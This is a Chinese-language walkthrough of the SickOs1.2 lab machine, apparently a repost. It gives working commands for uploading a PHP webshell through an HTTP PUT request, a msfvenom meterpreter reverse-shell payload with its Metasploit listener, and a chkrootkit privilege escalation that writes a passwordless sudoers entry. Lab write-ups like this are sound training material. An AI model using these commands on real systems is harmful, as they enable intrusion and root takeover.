SickOs1.2 靶机渗透

2021/11/10 6:41:20

本文主要是介绍SickOs1.2 靶机渗透,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

靶机记录--9

目录

1.主机发现

2.端口扫描

3.版本信息,操作系统扫描 

4.漏洞查找及利用

访问网站">1> 访问网站

22端口尝试ssh登陆">2> 22端口尝试ssh登陆

目录扫描">3> 目录扫描

 查看该目录支持的方法">4> 查看该目录支持的方法

> nmap探测">1>> nmap探测

> burp抓包探测">2>> burp抓包探测

写入一句话木马">5> 写入一句话木马

蚁剑连接">6> 蚁剑连接

getshell ">7> getshell 

> 将kali自带的反弹shell脚本复制出来">1>> 将kali自带的反弹shell脚本复制出来

> 搞到蚁剑里来">2>> 搞到蚁剑里来

> 访问反弹脚本">3>> 访问反弹脚本

> getshell">4>> getshell

提权">8> 提权

> 先查看内核版本和系统版本 ">1>> 先查看内核版本和系统版本 

> ls -la /etc/cron*">2>> ls -la /etc/cron*

> chkrootkit(后门检测工具,存在于上面那个目录,就是会每天执行)">3>> chkrootkit(后门检测工具,存在于上面那个目录,就是会每天执行)

> 利用chkrootkit,添加当前用户www-data到sudoers列表中">4>> 利用chkrootkit,添加当前用户www-data到sudoers列表中

提权成功

getshell方法二


1.主机发现

2.端口扫描

有开启22,80端口

3.版本信息,操作系统扫描 

OpenSSH 5.9p1

lighttpd 1.4.28

4.漏洞查找及利用

1> 访问网站

未发现可以利用的东西

2> 22端口尝试ssh登陆

 root/root 登陆成功。。。但是这不是练习目的

3> 目录扫描

找到一个类似上传文件目录的东西

4> 查看该目录支持的方法

1>> nmap探测

nmap --script=http-methods --script-args http-methods.url-path=test 192.168.129.223

可以看到,该目录支持PUT方法

2>> burp抓包探测

还可以用options 去探测其支持的方法

5> 写入一句话木马

直接就在上面那个包里修改,,201 创建成功

6> 蚁剑连接

7> getshell 

1>> 将kali自带的反弹shell脚本复制出来

2>> 搞到蚁剑里来

修改ip+端口(有限制,用443)

3>> 访问反弹脚本

 

4>> getshell

kali这边提前监听

8> 提权

1>> 先查看内核版本和系统版本 

2>> ls -la /etc/cron*

 在/etc/cron.daily 目录下,创建脚本chmod +x 给与执行权限,每天会自动执行

3>> chkrootkit(后门检测工具,存在于上面那个目录,就是会每天执行)

找到 chkrootkit 存在本地提权漏洞

看一下那个txt文件

 里面大概意思就是,会定期以root身份执行/tmp/update文件

4>> 利用chkrootkit,添加当前用户www-data到sudoers列表中

/etc/sudoers 该文件允许特定用户像root用户一样使用各种各样的命令,而不需要root用户的密码

echo 'chmod +w /etc/sudoers && echo "www-data ALL=(ALL)NOPASSWD:ALL" >> /etc/sudoers' > /tmp/update

提权成功


getshell方法二

1> 利用msfvenom生成一个php木马

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.129.129 LPORT=443 -f raw > shell.php

2> 然后将其传到靶机

curl -v -H 'Expect:' -T shell.php "http://192.168.129.223/test/"

3> 在msf上开启监听

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.129.129
set lport 443
exploit -j
sudo netstat -plnt

4> 访问上传的脚本

5> 然后msf这里

session -i 1



这篇关于SickOs1.2 靶机渗透的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程